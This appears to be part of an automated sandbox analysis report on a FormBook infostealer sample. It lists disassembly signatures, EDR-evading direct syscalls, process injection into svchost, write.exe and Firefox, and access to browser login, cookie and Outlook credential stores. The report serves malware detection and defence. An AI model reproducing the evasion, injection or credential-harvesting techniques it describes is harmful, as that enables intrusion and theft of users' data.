            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037429A0 mov eax, dword ptr fs:[00000030h]8_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037309AD mov eax, dword ptr fs:[00000030h]8_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037309AD mov eax, dword ptr fs:[00000030h]8_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BE872 mov eax, dword ptr fs:[00000030h]8_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BE872 mov eax, dword ptr fs:[00000030h]8_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C6870 mov eax, dword ptr fs:[00000030h]8_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037C6870 mov eax, dword ptr fs:[00000030h]8_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03760854 mov eax, dword ptr fs:[00000030h]8_2_03760854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734859 mov eax, dword ptr fs:[00000030h]8_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03734859 mov eax, dword ptr fs:[00000030h]8_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03742840 mov ecx, dword ptr fs:[00000030h]8_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03752835 mov eax, dword ptr fs:[00000030h]8_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03752835 mov eax, dword ptr fs:[00000030h]8_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03752835 mov eax, dword ptr fs:[00000030h]8_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03752835 mov ecx, dword ptr fs:[00000030h]8_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03752835 mov eax, dword ptr fs:[00000030h]8_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03752835 mov eax, dword ptr fs:[00000030h]8_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376A830 mov eax, dword ptr fs:[00000030h]8_2_0376A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D483A mov eax, dword ptr fs:[00000030h]8_2_037D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D483A mov eax, dword ptr fs:[00000030h]8_2_037D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BC810 mov eax, dword ptr fs:[00000030h]8_2_037BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C8F9 mov eax, dword ptr fs:[00000030h]8_2_0376C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376C8F9 mov eax, dword ptr fs:[00000030h]8_2_0376C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037FA8E4 mov eax, dword ptr fs:[00000030h]8_2_037FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375E8C0 mov eax, dword ptr fs:[00000030h]8_2_0375E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037BC89D mov eax, dword ptr fs:[00000030h]8_2_037BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03730887 mov eax, dword ptr fs:[00000030h]8_2_03730887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375AF69 mov eax, dword ptr fs:[00000030h]8_2_0375AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0375AF69 mov eax, dword ptr fs:[00000030h]8_2_0375AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2F60 mov eax, dword ptr fs:[00000030h]8_2_037D2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D2F60 mov eax, dword ptr fs:[00000030h]8_2_037D2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372CF50 mov eax, dword ptr fs:[00000030h]8_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372CF50 mov eax, dword ptr fs:[00000030h]8_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372CF50 mov eax, dword ptr fs:[00000030h]8_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372CF50 mov eax, dword ptr fs:[00000030h]8_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372CF50 mov eax, dword ptr fs:[00000030h]8_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0372CF50 mov eax, dword ptr fs:[00000030h]8_2_0372CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0376CF50 mov eax, dword ptr fs:[00000030h]8_2_0376CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037D0F50 mov eax, dword ptr fs:[00000030h]8_2_037D0F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B4F40 mov eax, dword ptr fs:[00000030h]8_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B4F40 mov eax, dword ptr fs:[00000030h]8_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037B4F40 mov eax, dword ptr fs:[00000030h]8_2_037B4F40
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 2692Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\write.exeThread APC queued: target process: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C40008Jump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Z6s208B9QX.exe"Jump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: Z6s208B9QX.exe, UCAmCgWJyh.exe, 0000000A.00000000.1650784396.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744648444.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746140501.0000000001140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: UCAmCgWJyh.exe, 0000000A.00000000.1650784396.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744648444.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746140501.0000000001140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: UCAmCgWJyh.exe, 0000000A.00000000.1650784396.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744648444.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746140501.0000000001140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: Z6s208B9QX.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: UCAmCgWJyh.exe, 0000000A.00000000.1650784396.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744648444.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746140501.0000000001140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Z6s208B9QX.exeBinary or memory string: WIN_XP
            Source: Z6s208B9QX.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: Z6s208B9QX.exeBinary or memory string: WIN_XPe
            Source: Z6s208B9QX.exeBinary or memory string: WIN_VISTA
            Source: Z6s208B9QX.exeBinary or memory string: WIN_7
            Source: Z6s208B9QX.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

